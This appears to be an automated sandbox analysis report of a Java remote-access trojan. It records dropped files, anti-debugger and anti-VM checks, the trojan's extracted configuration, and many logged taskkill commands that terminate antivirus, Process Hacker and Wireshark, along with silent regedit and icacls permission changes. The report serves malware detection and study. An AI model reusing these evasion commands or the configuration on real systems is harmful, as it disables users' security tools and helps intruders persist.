Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\prism_d3d.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-console-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jfxmedia.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jp2launcher.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l2-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-string-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\t2k.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\glass.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-interlocked-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\java-rmi.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\resource.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-synch-l1-2-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-datetime-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jdwp.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jaas_nt.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\splashscreen.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\decora_sse.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\plugin2\msvcp140.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-memory-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-locale-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\keytool.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-process-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\wsdetect.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-time-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jp2native.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\j2pkcs11.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-processenvironment-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\npt.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jfr.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\unpack200.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\dcpr.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javafx_iio.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jsdt.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\glib-lite.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\fxplugins.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\WindowsAccessBridge-32.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\instrument.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jsound.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\rmiregistry.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\JAWTAccessBridge-32.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jp2iexp.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jp2ssv.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javaws.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-timezone-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\ssv.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.cpl	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jsoundds.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-stdio-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\rmid.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-processthreads-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jli.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\nio.dll	Jump to dropped file

Found evasive API chain (may stop execution after checking a module file name)

Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

Found large amount of non-executed APIs

Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe

API coverage: 1.2 %

Source: javaw.exe, 00000001.00000002.2947521616.0000000004413000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: BDescription=Microsoft Hyper-V Virtualization Infrastructure Driver
Source: javaw.exe, 00000001.00000002.2947521616.0000000004413000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.0000000009BF4000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.0000000009BAA000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2947521616.0000000004729000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Description=Microsoft Hyper-V Virtualization Infrastructure Driver
Source: java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWARE{
Source: java.exe, 00000004.00000002.2948370667.0000000004A45000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: {"NETWORK":[{"PORT":7777,"DNS":"127.0.0.1"}],"INSTALL":false,"MODULE_PATH":"zS/lq/BTk.GI","PLUGIN_FOLDER":"DdWDtpinxpf","JRE_FOLDER":"HSIROD","JAR_FOLDER":"fUTkALeaTxM","JAR_EXTENSION":"Vybgol","ENCRYPT_KEY":"cPFjgddXIBcXBCIseEuXTZjwi","DELAY_INSTALL":2,"NICKNAME":"User","VMWARE":false,"PLUGIN_EXTENSION":"DhjWU","WEBSITE_PROJECT":"https://jrat.io","JAR_NAME":"uiylKSALYJr","JAR_REGISTRY":"WLyQyhWoosi","DELAY_CONNECT":2,"VBOX":false}
Source: java.exe, 00000004.00000003.1751960027.0000000014C6C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: com/sun/corba/se/impl/util/SUNVMCID.classPK
Source: javaw.exe, 00000001.00000002.2947521616.0000000004413000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.0000000009BF4000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.0000000009BAA000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2947521616.0000000004729000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: DeviceName=Microsoft Hyper-V Virtualization Infrastructure Driver
Source: java.exe, 00000004.00000003.1751960027.0000000014C6C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: &com/sun/corba/se/impl/util/SUNVMCID.classPK
Source: javaw.exe, 00000001.00000002.2947521616.0000000004413000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Adevicename=microsoft hyper-v virtualization infrastructure driver
Source: xcopy.exe, 00000012.00000003.1809732405.000000000229E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: JVM version %s (%s, %s)VirtualMachineImpl.cRedefineClassesGetTopThreadGroupsJNI_FALSENewStringUTF;classTrack.csignaturessignature bagDeleteWeakGlobalRefclassTrack tableloaded classesAttempting to insert duplicate classKlassNodesignatureNewWeakGlobalRefloaded classes arraycommonRef.cSetTagFreeing %d (%x)
Source: javaw.exe, 00000001.00000002.2942955746.0000000000438000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2944078896.0000000000C9B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [Ljava/lang/VirtualMachineError;
Source: xcopy.exe, 00000012.00000003.1809732405.000000000229E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VirtualMachineImpl.c
Source: java.exe, 00000004.00000003.1751960027.0000000014C6C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: org/omg/CORBA/OMGVMCID.classPK
Source: javaw.exe, 00000001.00000002.2942955746.0000000000438000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2944078896.0000000000C9B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: cjava/lang/VirtualMachineError
Source: javaw.exe, 00000001.00000002.2947521616.00000000043B5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: manufacturer=vmware, inc.
Source: javaw.exe, 00000001.00000002.2947521616.0000000004413000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ADeviceName=Microsoft Hyper-V Virtualization Infrastructure Driver
Source: java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWARE
Source: javaw.exe, 00000001.00000003.1746488573.000000001466C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000003.1751960027.0000000014C6C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: java/lang/VirtualMachineError.classPK
Source: javaw.exe, 00000001.00000002.2947521616.00000000043B5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Manufacturer=VMware, Inc.
Source: java.exe, 00000004.00000002.2948370667.0000000004981000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: {"NETWORK":[{"PORT":7777,"DNS":"127.0.0.1"}],"INSTALL":false,"MODULE_PATH":"zS/lq/BTk.GI","PLUGIN_FOLDER":"DdWDtpinxpf","JRE_FOLDER":"HSIROD","JAR_FOLDER":"fUTkALeaTxM","JAR_EXTENSION":"Vybgol","ENCRYPT_KEY":"cPFjgddXIBcXBCIseEuXTZjwi","DELAY_INSTALL":2,"NICKNAME":"User","VMWARE":false,"PLUGIN_EXTENSION":"DhjWU","WEBSITE_PROJECT":"https://jrat.io","JAR_NAME":"uiylKSALYJr","JAR_REGISTRY":"WLyQyhWoosi","DELAY_CONNECT":2,"VBOX":false}
Source: javaw.exe, 00000001.00000002.2947521616.0000000004413000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Bdescription=microsoft hyper-v virtualization infrastructure driver
Source: javaw.exe, 00000001.00000002.2942955746.0000000000438000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2944078896.0000000000C9B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe

API call chain: ExitProcess graph end node

Source: C:\Windows\SysWOW64\wbem\WMIC.exe

Process information queried: ProcessInformation

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe

Code function: 1_2_6EEF2C97 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

1_2_6EEF2C97

Contains functionality to dynamically determine API calls

Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe

1_2_6EEF45FB

Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 1_2_6EEF2C97 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		1_2_6EEF2C97
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 1_2_6EEF1244 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		1_2_6EEF1244

Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe

Memory protected: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Excessive usage of taskkill to terminate processes

Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM UserAccountControlSettings.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ProcessHacker.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MSASCui.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MpUXSrv.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MpCmdRun.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM NisSrv.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ConfigSecurityPolicy.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM wireshark.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM tshark.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM text2pcap.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM rawshark.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mergecap.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM editcap.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ProcessHacker.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM capinfos.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbam.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM tshark.exe /T /F	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe "C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\cmukyspiy.txt"	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe "C:\Program Files (x86)\Java\jre-1.8\bin\java.exe" -jar C:\Users\user\AppData\Local\Temp\_0.335919510014015658379257619551515348.class	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive8340316412854535662.vbs	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive6110391193418258336.vbs	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "C:\Program Files (x86)\Java\jre-1.8" "C:\Users\user\AppData\Roaming\Oracle\" /e	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM UserAccountControlSettings.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c regedit.exe /s C:\Users\user\AppData\Local\Temp\XGkhOkmDsC474469576599115670.reg	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ProcessHacker.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MSASCui.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MpUXSrv.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4143913798509633277.vbs	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MpCmdRun.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM NisSrv.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ConfigSecurityPolicy.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM wireshark.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM tshark.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM text2pcap.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM rawshark.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mergecap.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM editcap.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ProcessHacker.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM capinfos.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbam.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4143913798509633277.vbs	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
